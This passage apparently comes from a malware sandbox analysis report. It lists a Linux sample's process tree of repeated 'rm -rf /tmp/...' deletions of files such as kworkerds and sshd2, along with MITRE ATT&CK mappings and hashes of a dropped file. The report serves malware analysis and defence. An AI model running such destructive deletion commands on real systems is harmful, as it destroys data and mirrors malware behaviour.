  2⤵
  PID:1819
- /bin/rm
  rm -rf /tmp/log_rot
  2⤵
  PID:1820
- /bin/rm
  rm -rf /tmp/apachiii
  2⤵
  PID:1821
- /bin/rm
  rm -rf /tmp/sustse
  2⤵
  PID:1822
- /bin/rm
  rm -rf /tmp/php
  2⤵
  PID:1823
- /bin/rm
  rm -rf /tmp/p2.conf
  2⤵
  PID:1824
- /bin/rm
  rm -rf /tmp/pprt
  2⤵
  PID:1825
- /bin/rm
  rm -rf /tmp/ppol
  2⤵
  PID:1826
- /bin/rm
  rm -rf /tmp/javax/config.sh
  2⤵
  PID:1827
- /bin/rm
  rm -rf /tmp/javax/sshd2
  2⤵
  PID:1828
- /bin/rm
  rm -rf /tmp/.profile
  2⤵
  PID:1829
- /bin/rm
  rm -rf /tmp/1.so
  2⤵
  PID:1830
- /bin/rm
  rm -rf /tmp/kworkerds
  2⤵
  PID:1831

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/zzhs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads